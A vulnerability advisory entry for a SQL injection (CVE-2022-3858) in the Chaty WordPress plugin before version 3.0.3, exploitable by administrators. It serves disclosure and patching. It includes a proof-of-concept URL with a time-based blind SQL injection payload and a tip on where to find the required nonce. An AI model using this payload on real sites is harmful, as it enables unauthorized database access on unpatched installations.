Lucene search
Nguyen Duy Quoc KhanhWPEX-ID:D251B6C1-602B-4D72-9D6A-BF5D5EC541ECHistoryNov 14, 2022 - 12:00 a.m.
Chaty < 3.0.3 - Admin+ SQLi
2022-11-1400:00:00
Nguyen Duy Quoc Khanh
188
chaty 3.0.3
sql injection
admin page security
nonce vulnerability
website exploit
0.001 Low
EPSS
Percentile
37.9%
The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as admin.
https://example.com/wp-admin/admin.php?page=chaty-contact-form-feed&remove_chaty_leads=9a03751f9d&action=delete_message&paged=1&search&chaty_leads=3)+AND+(SELECT+42+FROM+(SELECT(SLEEP(5)))b)%3B--+-
To get the nonce, check the source of https://example.com/wp-admin/admin.php?page=chaty-contact-form-feed for remove_chaty_leadsRelated
openvas
openvas
WordPress Chaty Plugin < 3.0.3 SQLi Vulnerability
2022-12-06 00:00:00
nvd
nvd
CVE-2022-3858
2022-12-05 17:15:10
cvelist
cvelist
CVE-2022-3858 Chaty < 3.0.3 - Admin+ SQLi
2022-12-05 16:50:40
wpvulndb
wpvulndb
Chaty < 3.0.3 - Admin+ SQLi
2022-11-14 00:00:00
cve
cve
CVE-2022-3858
2022-12-05 17:15:10
prion
prion
Sql injection
2022-12-05 17:15:00